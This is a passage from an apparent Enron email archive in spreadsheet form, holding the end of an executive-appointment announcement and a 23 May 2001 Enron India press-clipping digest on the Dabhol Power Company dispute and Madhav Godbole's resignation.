Management.  In his new role, Kevin will devote the vast majority of his ti=_x000D_
me=20_x000D_
and efforts to building a successful bandwidth intermediation business for=_x000D_
=20_x000D_
Enron, in addition to providing global risk management oversight.  Kevin wi=_x000D_
ll=20_x000D_
report to Enron=01,s Office of the Chairman and will serve on the Executive=_x000D_
=20_x000D_
Committee. Because of his efforts to build bandwidth intermediation=20_x000D_
capabilities, he also will report to the Office of the Chairman of Enron=20_x000D_
Broadband Services._x000D_
_x000D_
Greg Whalley has been named president and COO of Enron North America, where=_x000D_
=20_x000D_
he will fully dedicate his efforts to ENA=01,s continued growth and success=_x000D_
. =20_x000D_
Greg will retain responsibility for ENA=01,s Risk Management functions but =_x000D_
will=20_x000D_
transition his global responsibilities to Kevin._x000D_
_x000D_
Please join us in congratulating Greg and Kevin in their new positions.</t>
  </si>
  <si>
    <t>Wed, 23 May 2001 05:39:12 -0700 (PDT)</t>
  </si>
  <si>
    <t>From the Enron India newsdesk - May 23 newsclips</t>
  </si>
  <si>
    <t>THE ECONOMIC TIMES_x000D_
Wednesday, 23 May, 2001, http://www.economictimes.com/today/bn01.htm_x000D_
Godbole quits, protests Pawar's remarks, Aditya Chatterjee=20_x000D_
_x000D_
The above article appeared in the following newspapers:_x000D_
Wednesday, 23 May, 2001,http://www.timesofindia.com/today/23busu1.htm_x000D_
Godbole quits Enron panel over Pawar's remarks, Aditya Chatterjee_x000D_
_x000D_
Wednesday, 23 May, 2001,http://www.asianageonline.com/_x000D_
GODBOLE RESIGNS FROM ENRON PANEL_x000D_
_x000D_
MID DAY, Wednesday, 23 May, 2001,_x000D_
http://www.chalomumbai.com/asp/article.asp?cat_id=3D29&amp;cat_code=3D2f5748415=_x000D_
45f535f4f4e5f4d554d4241492f5441415a415f4b4841424152&amp;art_id=3D11044_x000D_
Godbole quits from Enron renegotiation panel_x000D_
---------------------------------------------------------------------------=_x000D_
---------------------------------------------------------------------------=_x000D_
----------------------------------------_x000D_
MID DAY,  Wednesday, 23 May, 2001,_x000D_
http://www.chalomumbai.com/asp/article.asp?cat_id=3D29&amp;art_id=3D11046&amp;cat_c=_x000D_
ode=3D2F574841545F535F4F4E5F4D554D4241492F5441415A415F4B4841424152_x000D_
CM refuses to accept Godbole's resignation_x000D_
The above article appeared in the following newspaper:_x000D_
BUSINESS STANDARD_x000D_
Wednesday, 23 May, 2001,http://www.business-standard.com/today/news.asp?Men=_x000D_
u=3D67#3_x000D_
Maharashtra CM asks Godbole to withdraw resignation (1230 hrs IST)_x000D_
---------------------------------------------------------------------------=_x000D_
---------------------------------------------------------------------------=_x000D_
----------------------------------------_x000D_
THE ECONOMIC TIMES_x000D_
Wednesday, 23 May, 2001,http://www.economictimes.com/today/in04.htm_x000D_
'Govt should take a stand &amp; stand by it', Aditya Chatterjee=20_x000D_
---------------------------------------------------------------------------=_x000D_
---------------------------------------------------------------------------=_x000D_
----------------------------------------_x000D_
THE ECONOMIC TIMES_x000D_
Wednesday, 23 May, 2001,http://www.economictimes.com/today/in03.htm_x000D_
Should India pull the plug on Enron?, Aditya Chatterjee &amp; Pooja Kothari=20_x000D_
---------------------------------------------------------------------------=_x000D_
---------------------------------------------------------------------------=_x000D_
----------------------------------------_x000D_
FINANCIAL TIMES_x000D_
Wednesday, 23 May, 2001,http://globalarchive.ft.com/globalarchive/articles.=_x000D_
html?print=3Dtrue&amp;id=3D010523001016_x000D_
Enron may seek damages, JULIE EARLE_x000D_
---------------------------------------------------------------------------=_x000D_
---------------------------------------------------------------------------=_x000D_
----------------------------------------_x000D_
THE ECONOMIC TIMES_x000D_
Wednesday, 23 May, 2001,http://www.economictimes.com/today/in05.htm_x000D_
Comments not on behalf of Maharashtra govt: Pawar_x000D_
_x000D_
The above article appeared in the following newspapers:_x000D_
_x000D_
BUSINESS STANDARD_x000D_
Wednesday, 23 May, 2001,http://www.business-standard.com/today/news.asp?Men=_x000D_
u=3D67#7_x000D_
Comments on Godbole not on behalf of Maharashtra govt, says Pawar (1500 hrs=_x000D_
 IST)_x000D_
_x000D_
MID DAY,Wednesday, 23 May, 2001,_x000D_
http://www.chalomumbai.com/asp/article.asp?cat_id=3D29&amp;art_id=3D11047&amp;cat_c=_x000D_
ode=3D2F574841545F535F4F4E5F4D554D4241492F5441415A415F4B4841424152_x000D_
I was misquoted on Enron: Pawar_x000D_
---------------------------------------------------------------------------=_x000D_
---------------------------------------------------------------------------=_x000D_
----------------------------------------_x000D_
THE ECONOMIC TIMES_x000D_
Wednesday, 23 May, 2001,http://www.economictimes.com/today/in06.htm_x000D_
Enron renegotiation meet called off_x000D_
---------------------------------------------------------------------------=_x000D_
---------------------------------------------------------------------------=_x000D_
----------------------------------------_x000D_
THE ECONOMIC TIMES_x000D_
Wednesday, 23 May, 2001,http://www.economictimes.com/today/23econ02.htm_x000D_
Maharashtra may terminate DPC's services, Girish Kuber=20_x000D_
---------------------------------------------------------------------------=_x000D_
---------------------------------------------------------------------------=_x000D_
----------------------------------------_x000D_
THE ECONOMIC TIMES_x000D_
Wednesday, 23 May, 2001,http://www.economictimes.com/today/23econ21.htm_x000D_
MSEB employees to stage dharna at Dabhol on June 5_x000D_
---------------------------------------------------------------------------=_x000D_
---------------------------------------------------------------------------=_x000D_
----------------------------------------_x000D_
THE INDIAN EXPRESS_x000D_
Wednesday, 23 May, 2001,http://www.indian-express.com/ie20010523/bus1.html_x000D_
DPC fracas: NPA problem stares at FIs, stocks fall, George Mathew_x000D_
---------------------------------------------------------------------------=_x000D_
---------------------------------------------------------------------------=_x000D_
----------------------------------------_x000D_
THE INDIAN EXPRESS_x000D_
Wednesday, 23 May, 2001,http://www.indian-express.com/ie20010523/bus2.html_x000D_
Indian power firms not keen on buying DPC, Dev Chatterjee_x000D_
---------------------------------------------------------------------------=_x000D_
---------------------------------------------------------------------------=_x000D_
----------------------------------------_x000D_
THE INDIAN EXPRESS_x000D_
Wednesday, 23 May, 2001,http://www.indian-express.com/ie20010523/bus4.html_x000D_
DPC's Indian lenders may skip June meet in Singapore_x000D_
_x000D_
The above article also appeared in the following newspaper:_x000D_
_x000D_
THE FINANCIAL EXPRESS_x000D_
Wednesday, 23 May, 2001,http://www.financialexpress.com/fe20010523/eco3.htm=_x000D_
l_x000D_
FIs may skip lenders meet in June=20_x000D_
---------------------------------------------------------------------------=_x000D_
---------------------------------------------------------------------------=_x000D_
----------------------------------------_x000D_
THE FINANCIAL EXPRESS_x000D_
Wednesday, 23 May, 2001,http://www.financialexpress.com/fe20010523/eco1.htm=_x000D_
l#_x000D_
Scrips of DPC lenders dip after termination notice , Aarti Shetty_x000D_
---------------------------------------------------------------------------=_x000D_
---------------------------------------------------------------------------=_x000D_
----------------------------------------_x000D_
THE FINANCIAL EXPRESS_x000D_
Wednesday, 23 May, 2001,http://www.financialexpress.com/fe20010523/news6.ht=_x000D_
ml_x000D_
State advocate general dubs MSEBs claim justified, Sanjay Jog_x000D_
---------------------------------------------------------------------------=_x000D_
---------------------------------------------------------------------------=_x000D_
----------------------------------------_x000D_
BUSINESS STANDARD_x000D_
Wednesday, 23 May, 2001,http://www.business-standard.com/today/corp13.asp?M=_x000D_
enu=3D2_x000D_
Enron goes for India business valuation ,P Vaidyanathan Iyer &amp; Parul Gupta =_x000D_
in New Delhi_x000D_
---------------------------------------------------------------------------=_x000D_
---------------------------------------------------------------------------=_x000D_
----------------------------------------_x000D_
BUSINESS STANDARD_x000D_
Wednesday, 23 May, 2001,http://www.business-standard.com/today/financ12.asp=_x000D_
?Menu=3D5_x000D_
DPC imbroglio: Rs 5,255 crore at stake for Indian lenders, Tamal Bandyopadh=_x000D_
yay in Mumbai_x000D_
---------------------------------------------------------------------------=_x000D_
---------------------------------------------------------------------------=_x000D_
----------------------------------------_x000D_
BUSINESS STANDARD_x000D_
Wednesday, 23 May, 2001,http://www.business-standard.com/today/opinion5.asp=_x000D_
?menu=3D8_x000D_
'An inexcusable failure of governance'_x000D_
---------------------------------------------------------------------------=_x000D_
---------------------------------------------------------------------------=_x000D_
----------------------------------------_x000D_
BUSINESS STANDARD_x000D_
Wednesday, 23 May, 2001,http://www.business-standard.com/today/economy6.asp=_x000D_
?Menu=3D3_x000D_
DPC tangle: Centre adopts wait &amp; watch policy, Subhomoy Bhattacharjee &amp; San=_x000D_
tosh Tiwary in New Delhi_x000D_
---------------------------------------------------------------------------=_x000D_
---------------------------------------------------------------------------=_x000D_
----------------------------------------_x000D_
THE ECONOMIC TIMES_x000D_
Wednesday, 23 May, 2001,http://www.economictimes.com/today/23econ19.htm_x000D_
DPC to attend Godbole panel meet tomorrow_x000D_
---------------------------------------------------------------------------=_x000D_
---------------------------------------------------------------------------=_x000D_
----------------------------------------_x000D_
THE ECONOMIC TIMES_x000D_
Wednesday, 23 May, 2001,http://www.economictimes.com/today/23econ20.htm_x000D_
DPC looks forward to Godbole panel's solutions_x000D_
---------------------------------------------------------------------------=_x000D_
---------------------------------------------------------------------------=_x000D_
----------------------------------------_x000D_
THE ECONOMIC TIMES_x000D_
Wednesday, 23 May, 2001,http://www.economictimes.com/today/wl01.htm_x000D_
Enron pulls out of venture drilling in Qatar's  waters_x000D_
---------------------------------------------------------------------------=_x000D_
---------------------------------------------------------------------------=_x000D_
----------------------------------------_x000D_
_x000D_
THE ECONOMIC TIMES_x000D_
Wednesday, 23 May, 2001, http://www.economictimes.com/today/bn01.htm_x000D_
Godbole quits, protests Pawar's remarks, Aditya Chatterjee=20_x000D_
_x000D_
DR MADHAV Godbole, chairman of the Godbole Committee, appointed by the Maha=_x000D_
rashtra government to  renegotiate the power purchase agreement with Enron-=_x000D_
promoted Dabhol Power Company, has resigned after Nationalist Congress Part=_x000D_
y supremo Sharad Pawar implied that he was not the right person to head the=_x000D_
 talks. In an apparent criticism of Godbole, Pawar had said on Tuesday he w=_x000D_
as apprehensive about the outcome of the renegotiations "as those leading t=_x000D_
he talks from the government side are working with a negative approach". Go=_x000D_
dbole's resignation was in protest of this allegation. "I have resigned due=_x000D_
 to derogatory remarks made against me by Nationalist Congress Party chief =_x000D_
Sharad Pawar on Tuesday night," Godbole said here. Maharashtra has a coalit=_x000D_
ion government, comprising the Congress and the NCP. And as the chief of NC=_x000D_
P, Pawar has considerable clout in Maharashtra politics.=20_x000D_
_x000D_
Pawar was the state's chief minister when Maharashtra first signed an agree=_x000D_
ment with US-based power major Enron. DPC is a joint venture, with Enron as=_x000D_
 the majority shareholder. Enron has publicly said it was not willing to ac=_x000D_
cept the terms of the Godbole panel report, which had suggested a re-negoti=_x000D_
ation of PPA, among others. In the light of Godbole's resignation, it seems=_x000D_
 that Enron may have scored a vital point in its negotiation with governmen=_x000D_
t authorities. It is not surprising that Enron is inimical to Godbole. The =_x000D_
Madhav Godbole-led Energy Review Committee's report on the DPC project in M=_x000D_
aharashtra had blamed DPC as well its major shareholders, Enron, General El=_x000D_
ectric and Bechtel, for a lack of due diligence to ensure the absorption of=_x000D_
 the entire DPC power after phase II was complete. The report had also slam=_x000D_
med the role of financial institutions when it found they had exhibited poo=_x000D_
r  judgement and lack of due diligence in accepting these  projections with=_x000D_
out demur, and disbursing funds for the  phase II of the DPC project. "The =_x000D_
decision of the financial institutions to fund this project seems to have b=_x000D_
een based primarily on the escrow account given by MSEB, the state governme=_x000D_
nt guarantee  and the counter guarantee by the Central government for phase=_x000D_
 I, rather than an independent and meticulous appraisal of the project," th=_x000D_
e Godbole report noted.=20_x000D_
_x000D_
The same financial institutions are now vigorously lobbying  with the Centr=_x000D_
e to ensure Enron does not pull out of India. The Godbole Committee had als=_x000D_
o expressed deep concern at the apparent failure of overnance that allowed =_x000D_
such decisions to be taken. "A government that takes decisions involving th=_x000D_
e incurring   of liabilities to the extent of over Rs 6,000 crore a year (a=_x000D_
nd rising) for over 20 years, in so cavalier a fashion, cannot at   the sam=_x000D_
e time, assert that the courts must presume it  acts in the public interest=_x000D_
," the report noted. The crux of India's problems with Enron lies on the is=_x000D_
sue of whether Enron is over-charging India. The Maharashtra government say=_x000D_
s that when the first PPA was signed in 1994, it was assumed that the DPC w=_x000D_
ould  provide power at the rate of Rs 2.20 per unit, corresponding  with th=_x000D_
e rate of dollar at Rs 30 and cost of LNG at Rs  4,300 prevailing at that t=_x000D_
ime. But that criterion, unfortunately, has not been considered, and now th=_x000D_
e state has to pay Rs 8.54 for every unit of power.=20_x000D_
_x000D_
State chief minister Vilasrao Deshmukh has gone on record to say: ``Even if=_x000D_
 we buy the entire power as per the agreement, the cost will be Rs 5.20 per=_x000D_
 unit." Enron, of course, claims that the higher power tariff was on accoun=_x000D_
t of the depreciation of the rupee against the dollar and the increase in w=_x000D_
orld fuel prices. The negotiating committee, which comprises members of the=_x000D_
 Godbole Committee, representatives of Enron, Maharashtra State Electricity=_x000D_
 Board and the Centre, was supposed to meet on Wednesday, but the meeting w=_x000D_
as cancelled after Godbole put in his papers. It is not clear at this junct=_x000D_
ure whether the Maharashtra government will straight-away appoint a success=_x000D_
or to Godbole or request him to reconsider his decision to  resign._x000D_
_x000D_
MID DAY,  Wednesday, 23 May, 2001,_x000D_
http://www.chalomumbai.com/asp/article.asp?cat_id=3D29&amp;art_id=3D11046&amp;cat_c=_x000D_
ode=3D2F574841545F535F4F4E5F4D554D4241492F5441415A415F4B4841424152_x000D_
CM refuses to accept Godbole's resignation_x000D_
_x000D_
In a significant development, CM Vilasrao Deshmukh has refused to accept th=_x000D_
e resignation  of Madhav Godbole, who heads the Enron renegotiation panel, =_x000D_
saying that he (Godbole)  need not react to comments made by persons "outsi=_x000D_
de the government".Deshmukh confirmed receiving Godbole's resignation but s=_x000D_
aid that he has not accepted it. " I told him that he need not react to the=_x000D_
 comments made by persons outside the government. The panel was appointed b=_x000D_
y the state Government and we as the government are in total support of God=_x000D_
bole. I have requested him to continue and I hope that he will reconsider h=_x000D_
is decision". When asked if the crisis would pose any threat to the ruling =_x000D_
coalition Deshmukh said there was no immediate cause for worry._x000D_
_x000D_
 Meanwhile, a crucial meeting on re-negotiation of the Power Purchase Agree=_x000D_
ment (PPA) between Maharashtra State Eelectricity Board (MSEB) and Enron-pr=_x000D_
omoted Dabhol Power Company (DPC) for 2184 mw power plant at Guhaghar in Ra=_x000D_
tnagiri district has been cancelled following the resignation of Godbole. C=_x000D_
onfirming the cancellation of the meeting, the MSEB chairman and member of =_x000D_
re-negotiation commitee, Vinay Bansal said that in wake of the resignation =_x000D_
of committee chairman Dr Madhavrao Godbole the meeting has been cancelled. =_x000D_
 Godbole chief of the committee appointed by the state Government to renego=_x000D_
tiate Power Purchase Agreement (PPA) with Dabhol Power Corporation (DPC) ha=_x000D_
d resigned this morning following criticism by the NCP president Sharad Paw=_x000D_
ar.Pawar had said that it was difficult to find any solution through a comm=_x000D_
ittee which was headed by a person having negative mind set. Though he did =_x000D_
not mention Godbole, his criticism was clearly directed towards him._x000D_
_x000D_
THE ECONOMIC TIMES_x000D_
Wednesday, 23 May, 2001,http://www.economictimes.com/today/in04.htm_x000D_
'Govt should take a stand &amp; stand by it', Aditya Chatterjee=20_x000D_
_x000D_
NATIONALIST Congress Party chief Sharad Pawar said on Tuesday he was appreh=_x000D_
ensive about the outcome of Maharashtra government's renegotiations with Da=_x000D_
bhol Power Company "as those leading the talks from the government side are=_x000D_
 working with a negative approach". Madhav Godbole, chairman of the negotia=_x000D_
ting committee, put in his papers in protest. Godbole spoke to Aditya Chatt=_x000D_
erjee of Times Internet Network about what led to his resignation. Excerpts=_x000D_
:=20_x000D_
_x000D_
You were appointed the negotiating committee chairman by the Maharashtra go=_x000D_
vernment to renegotiate the power purchase agreement with the Enron-promote=_x000D_
d Dabhol Power Company. A key member of the  government has now criticised =_x000D_
you. Do you feel being let down?=20_x000D_
The government should learn to first take a stand and then stand by it. As =_x000D_
you rightly pointed out, the Maharashtra government had appointed me as the=_x000D_
 committee head. And now, an important constituent of the government has al=_x000D_
leged that the negotiating committee has a negative attitude. This type of =_x000D_
a statement weakens the committee's stand on the crucial issue of negotiati=_x000D_
ng the power purchase agreement with DPC. The government should try to give=_x000D_
 all the support to the committee and help strengthen it. Tuesday's comment=_x000D_
s by the senior NCP leader is counter-productive in this light. I have resi=_x000D_
gned because if the state government is not able  to place its full trust o=_x000D_
n my capabilities, there's no reason  for me to stay on. Therefore, I sent =_x000D_
my resignation to the chief minister Vilasrao Deshmukh.=20_x000D_
_x000D_
Sharad Pawar was the chief minister of Maharashtra when the state first sig=_x000D_
ned an agreement with US-based power major Enron in 1993-94. You were also =_x000D_
regarded as the thorn in Enron's flesh. In fact, Enron has publicly said it=_x000D_
 was not willing to accept the terms of your committee report. Doesn't your=_x000D_
  resignation, in effect, help out Enron and its supporters?=20_x000D_
I would not like to comment on this. It's for you to decide. But, the outco=_x000D_
me of the negotiation will be decided by the kind of panel that the governm=_x000D_
ent constitutes. Hopefully, the committee will have a positive attitude thi=_x000D_
s time.=20_x000D_
_x000D_
Is your decision to resign final or will you consider withdrawing the lette=_x000D_
r if the state government requests you to continue?=20_x000D_
I haven't considered this issue at this point of time. Sharad Pawar did not=_x000D_
 specifically name you in his statement. He actually blamed the entire comm=_x000D_
ittee for having a negative approach. Do you think other conscientious memb=_x000D_
ers of the Godbole committee will now follow your lead and put in their pap=_x000D_
ers? That is a possibility. But, it's for the other members to decide.=20_x000D_
_x000D_
What is your future plan of action?=20_x000D_
Well, I will continue working on the report which involves the phase-II of =_x000D_
the DPC project and the restructuring the  operations of the Maharashtra St=_x000D_
ate Electricity Board. The report will be completed over the next 10 days._x000D_
_x000D_
THE ECONOMIC TIMES_x000D_
Wednesday, 23 May, 2001,http://www.economictimes.com/today/in03.htm_x000D_
Should India pull the plug on Enron?, Aditya Chatterjee &amp; Pooja Kothari=20_x000D_
_x000D_
THE Indian think-tank needs to quickly put their minds together in finding =_x000D_
an amicable solution to the current Enron-Dabhol Power Company-Maharashtra =_x000D_
government imbroglio and resolve the crisis which has risen over non-paymen=_x000D_
t of electricity bills. If the two sides reach an understanding, it will be=_x000D_
 the best   case scenario. If not, India has to think whether to continue w=_x000D_
ith a cancerous limb, or to simply cut it off to prevent further damage.=20_x000D_
_x000D_
The Maharashtra government has entrusted the Madhav Godbole panel with the =_x000D_
responsibility of negotiating a new power purchase agreement with Enron. Th=_x000D_
e panel would do well, if it takes into account the following. If Enron doe=_x000D_
s pull the plugs on DPC, the central government will have to cough up a sum=_x000D_
 of Rs 2,910 crore - which constitutes a penalty amount of Rs 1,500 crore f=_x000D_
or one year of electricity bill, and $300 million as termination  fees (whi=_x000D_
ch, at $1=3DRs 47, is equal to Rs 1,410 crore). This is a one-time payment,=_x000D_
 and the final figure of Rs 2,910  crore is certified by Union power secret=_x000D_
ary A K Basu.=20_x000D_
_x000D_
Now, instead of terminating the DPC project, if India were to continue with=_x000D_
 the present arrangement and keep paying Rs 1,500 crore per year for the ne=_x000D_
xt ten years to DPC, the net present value of this investment works out to =_x000D_
a whopping Rs 9,217 crore, which is nearly three times the price that India=_x000D_
 pays - if DPC is terminated. The NPV was calculated on the basis of Rs 2,9=_x000D_
10 crore  being put in a fixed deposit for 10 years, and the deposit earnin=_x000D_
g an interest rate of 10 per cent every year. However, another issue that a=_x000D_
lso needs to be taken into account is the exposure of the Indian financial =_x000D_
institutions and banks. FIs, led by the Industrial Development Bank of Indi=_x000D_
a, have, in two phases, provided loans of $ 95 million and $ 333 million, m=_x000D_
aking their total exposure equal to $428 million (which, at $1=3DRs 47, is =_x000D_
equal to Rs 2,012 crore). This apart, SBI also underwrote the maximum porti=_x000D_
on of a $557 million cross-border loan, and have an exposure of about $175 =_x000D_
million (or Rs 823 crore).=20_x000D_
_x000D_
Thus, the cumulative exposure of the Indian banks and financial institution=_x000D_
s in DPC works out to Rs 2,835 crore. However, since only 80 per cent of th=_x000D_
is amount has been disbursed so far and FIs have tightened their purse stri=_x000D_
ngs of late, the net exposure of Indian lenders in DPC works out to Rs 2,26=_x000D_
8 crore. Since the Indian lenders are not covered by any counter-guarantee,=_x000D_
 their bottomline would take a hit if Enron backed out of this project. The=_x000D_
 government being a  majority stakeholder in most of these institutions, wo=_x000D_
uld also take a hit on account of these losses. If all these loans are take=_x000D_
n into account, and added to the one-time payment of Rs 2,910 crore, the to=_x000D_
tal cost to government would be Rs 5,178 crore - which is still lower than =_x000D_
Rs 9,217 crore (the price India will pay to DPC, if the nation is to contin=_x000D_
ue with the present arrangement of paying Rs 1,500 crore per year over the =_x000D_
next ten years). Thus, going by the current scenario where a compromise see=_x000D_
ms like a very far-fetched option, the termination option will be a less co=_x000D_
stly one for the nation.=20_x000D_
_x000D_
However, the question which arises then is what happens to the assets and t=_x000D_
he plant in case of a termination. Well,  the government can sell it to pri=_x000D_
vate power players and  re-negotiate the cost factor with them - this time =_x000D_
hopefully  after doing a cost-benefit analysis! A sale of assets would also=_x000D_
 lessen the load on the government. Who knows - the government may actually=_x000D_
 strike a deal with another private sector player to sell the ownership of =_x000D_
DPC at a premium? Now, for our fears that cancelling the project might cost=_x000D_
 us future foreign direct investment since Enron is the biggest investor in=_x000D_
 India so far. Compare this - while Brazil raised $31 billion and China $49=_x000D_
 billion last year alone in foreign direct investment, how  much FDI can In=_x000D_
dia, with its annual inflow of about $4  billion, really lose? In short, it=_x000D_
's a case of losing what you don't have in the first place. The Godbole pan=_x000D_
el would also do well to note that many developing nations, who were pushed=_x000D_
 into signing expensive power projects by power MNCs, have  successfully re=_x000D_
-negotiated their contracts with no serious  financial consequences.=20_x000D_
_x000D_
Many nations simply did not have the money to pay for the  inflated bills, =_x000D_
some refused to pay even after losing international arbitration awards, whi=_x000D_
le some others like Costa Rica declared that the 15 contracts signed with I=_x000D_
ndependent Power Producers (like Enron) have no legal  status or are bad in=_x000D_
 law. There are others too.=20_x000D_
_x000D_
* In July 1999, the Hungarian parliament declared that a PPA signed with mu=_x000D_
ltinational RWE was unconstitutional and void.=20_x000D_
_x000D_
* In August 2000, the Croatian government insisted on  tearing up a PPA sig=_x000D_
ned by Enron with a previous  government. The contract was considered to be=_x000D_
 unaffordable, and was allegedly signed in politically  dubious circumstanc=_x000D_
es. Enron subsequently abandoned the original agreement.=20_x000D_
_x000D_
* In September 2000, the Philippines government took a decision of not rene=_x000D_
wing contracts with IPPs. This was done to avert the excessive financial bu=_x000D_
rden caused by these deals.=20_x000D_
_x000D_
The Enron project was always mired in controversy. One has seen how the Shi=_x000D_
v Sena-BJP combine had thundered during 1994 election campaigns that they w=_x000D_
ould "throw the Enron project in the Arabian Sea". Now, of course, the same=_x000D_
 BJP-led government at the Centre is bending backwards to prevent Enron fro=_x000D_
m packing its bags. One can understand the predicament of the Indian politi=_x000D_
cians. The MNC was the biggest contributor to the campaign fund of US presi=_x000D_
dent George Bush and has the high profile former US ambassador to India, Fr=_x000D_
ank Wisner among its  board of directors.=20_x000D_
_x000D_
In a sense, the fondness of the government for Enron is not surprising at a=_x000D_
ll since the Sena-BJP government of Maharashtra had taken pride for `succes=_x000D_
sfully' negotiating with Enron to increase the total output of the project =_x000D_
where an additional 1,444 mw was added to the 740 mw DPC project. It's a di=_x000D_
fferent matter that as of date, neither Maharashtra can consume all of DPC'=_x000D_
s 740 mw produce, nor it has the money to pay the bills. The crux of India'=_x000D_
s problems with Enron lies on the issue of whether Enron is over-charging I=_x000D_
ndia.=20_x000D_
_x000D_
The Maharashtra government says that when the first power purchase agreemen=_x000D_
t was signed in 1994, it was assumed that the Enron-sponsored DPC would pro=_x000D_
vide  power at the rate of Rs 2.20 per unit, corresponding with  the rate o=_x000D_
f dollar at Rs 30 and cost of LNG at Rs 4,300  prevailing at that time. But=_x000D_
 that criteria, unfortunately, has not been considered, and now the state h=_x000D_
as to pay Rs 8.54 for every unit of power. In fact, the state chief ministe=_x000D_
r Vilasrao Deshmukh  has gone on record to say: ``Even if we buy the entire=_x000D_
=20_x000D_
power as per the agreement, the cost will be Rs 5.20 per  unit."=20_x000D_
_x000D_
Enron, of course, claims that the higher power tariff was on account of the=_x000D_
 depreciation of the rupee against the dollar and the increase in world fue=_x000D_
l prices. Even during the first days of the Enron project, there were  enou=_x000D_
gh warnings from sensible quarters. For instance, in  August 1994, the then=_x000D_
 Union finance secretary had written  to the power secretary that that the =_x000D_
size of "the potential liability for a 1,000 MW plant, was around Rs 3,000 =_x000D_
crore per year". The department of economic affairs had also expressed a fe=_x000D_
ar that the "...risk of the counter guarantees being invoked was not unreal=_x000D_
, given that SEBs had been defaulting in payments...". Caution was thrown t=_x000D_
o the winds then. The least India can do now is to ask for a re-negotiation=_x000D_
. The question is does the Indian government have the guts to threaten a ca=_x000D_
ncellation and force Enron to re-negotiate?_x000D_
_x000D_
_x000D_
FINANCIAL TIMES_x000D_
Wednesday, 23 May, 2001,http://globalarchive.ft.com/globalarchive/articles.=_x000D_
html?print=3Dtrue&amp;id=3D010523001016_x000D_
Enron may seek damages, JULIE EARLE_x000D_
_x000D_
 Enron, the US power company, warned yesterday it would move to recoup sign=_x000D_
ificant termination damages if it was unable to settle a dispute over unpai=_x000D_
d bills with the Maharashtra State Electricity Board(MSEB). It is understoo=_x000D_
d that Enron would seek damages of Dollars 3.5bn (Pounds 2.4bn) to Dollars =_x000D_
5bn(Pounds 3.4bn). It has a 65 per cent stake in the Dabhol Power Company (=_x000D_
DPC), which operates the Bombay plant thathas supplied the MSEB. Julie Earl=_x000D_
e, New York For regional reports,=20_x000D_
_x000D_
_x000D_
THE ECONOMIC TIMES_x000D_
Wednesday, 23 May, 2001,http://www.economictimes.com/today/in05.htm_x000D_
Comments not on behalf of Maharashtra govt: Pawar_x000D_
_x000D_
REACTING to Madhav Godbole's resignation from the renegotiation panel, Nati=_x000D_
onalist Congress Party chief Sharad Pawar said on Wednesday that he was not=_x000D_
 talking on behalf of Maharashtra government when he commented on Tuesday o=_x000D_
n the "negative approach" of those leading the talks with Dabhol Power Comp=_x000D_
any. Godbole's decision to resign from the committee is a"personal one", Pa=_x000D_
war told reporters. He said there is need for renegotiations with Enron to =_x000D_
reduce power tariff of DPC and the Godbole panel should complete its unfini=_x000D_
shed work. Godbole submitted his resignation to the chief minister in the m=_x000D_
orning after an adverse comment made Pawar at a public meeting on Tuesday n=_x000D_
ight. Pawar had said he was "apprehensive of the outcome of  the discussion=_x000D_
s with Enron as those leading the talks from the government side are workin=_x000D_
g with a negative approach." (PTI)_x000D_
_x000D_
THE ECONOMIC TIMES_x000D_
Wednesday, 23 May, 2001,http://www.economictimes.com/today/in06.htm_x000D_
Enron renegotiation meet called off_x000D_
_x000D_
US-based Enron Power said on Wednesday a meeting with the expert panel set =_x000D_
up to renegotiate the  controversy-hit electricity supply contract to Mahar=_x000D_
ashtra  had suddenly been called off. "We went to attend the meeting and we=_x000D_
 were told the meeting was called off. We were not assigned any reason for =_x000D_
that," a spokesman of Enron's Indian arm told AFP by telephone.=20_x000D_
_x000D_
The state and Central governments last month decided to set up a panel to r=_x000D_
enegotiate the power purchaseagreement. The Enron-backed Dabhol Power Compa=_x000D_
ny has almost finished building a $3-billion two-part power plant in the we=_x000D_
stern state -- which is the single largest US investment  project in India.=_x000D_
 Part one of the plant began generating power in May 1999, but the project =_x000D_
has run into problems, with the Maharashtra government arguing it could not=_x000D_
 afford the high electricity  bills. Dabhol Power last Saturday issued a wa=_x000D_
rning notice threatening to terminate the electricity supply contract with =_x000D_
Maharashtra, due to the payments dispute. The "preliminary termination noti=_x000D_
ce" effectively gives six months to the state to sort out disputes over the=_x000D_
 power purchase pact with Enron.  Payments for electricity have been guaran=_x000D_
teed by the state and central governments.=20_x000D_
_x000D_
Early in April, Dabhol Power served the state electricity board a notice of=_x000D_
 political "force majeure," which is a legal manoeuvre that enables a party=_x000D_
 to break a contract in the case of events beyond its control. The Dabhol p=_x000D_
roject has had a turbulent ride since initial contracts were signed in 1992=_x000D_
. Allegations of corruption and high costs led to the scrapping of the cont=_x000D_
ract in 1995, but it was re-negotiated  the same year. In February a state =_x000D_
government panel recommended fresh re-negotiations to bring down the tariff=_x000D_
s and charged Enron with inflating costs. (Agencies)_x000D_
_x000D_
THE ECONOMIC TIMES_x000D_
Wednesday, 23 May, 2001,http://www.economictimes.com/today/23econ02.htm_x000D_
Maharashtra may terminate DPC's services, Girish Kuber=20_x000D_
_x000D_
THE DABHOL Power Company is likely to be served with a primary termination =_x000D_
notice from the Maharashtra government. Senior officials of the state's ene=_x000D_
rgy department and the Maharashtra State Electricity Board on Tuesday, sepa=_x000D_
rately, held a series of meetings with Maharashtra's Advocate-General to de=_x000D_
cide their strategy. "This is certainly the first option we are looking at =_x000D_
to tackle the situation after the Enron served a PTN to MSEB," sources from=_x000D_
 the state's energy minister said.=20_x000D_
_x000D_
The state government and MSEB will issue a primary termination notice to DP=_x000D_
C if Enron refuses to change its  stand and 'non-cooperation' with the Godb=_x000D_
ole panel  continues. "This could be the only option left with us to face t=_x000D_
he crisis," said sources. The decision to issue the termination notice will=_x000D_
 be arrived  at only after a meeting of the Godbole panel on Wednesday. The=_x000D_
 meet will also be attended by A V  Gokak, the Centre's nominee on the Godb=_x000D_
ole panel. This will be the first meeting being held after DPC issued the n=_x000D_
otice and also the first in which a Centres's nominee will be present. Mean=_x000D_
while, changing its earlier stand, US energy major Enron, DPC's promoter, h=_x000D_
as also decided to attend the meet. Enron said it was looking forward to "h=_x000D_
earing proposed solutions from the Godbole panel particularly related to cr=_x000D_
edit-worthy purchasers for the power".  An Enron spokesman said they were "=_x000D_
specially interested in the Centre's presence and learning of their expecte=_x000D_
d role"._x000D_
_x000D_
THE ECONOMIC TIMES_x000D_
Wednesday, 23 May, 2001,http://www.economictimes.com/today/23econ21.htm_x000D_
MSEB employees to stage dharna at Dabhol on June 5_x000D_
_x000D_
EMPLOYEES' unions of the Maharashtra State Electricity Board will stage a d=_x000D_
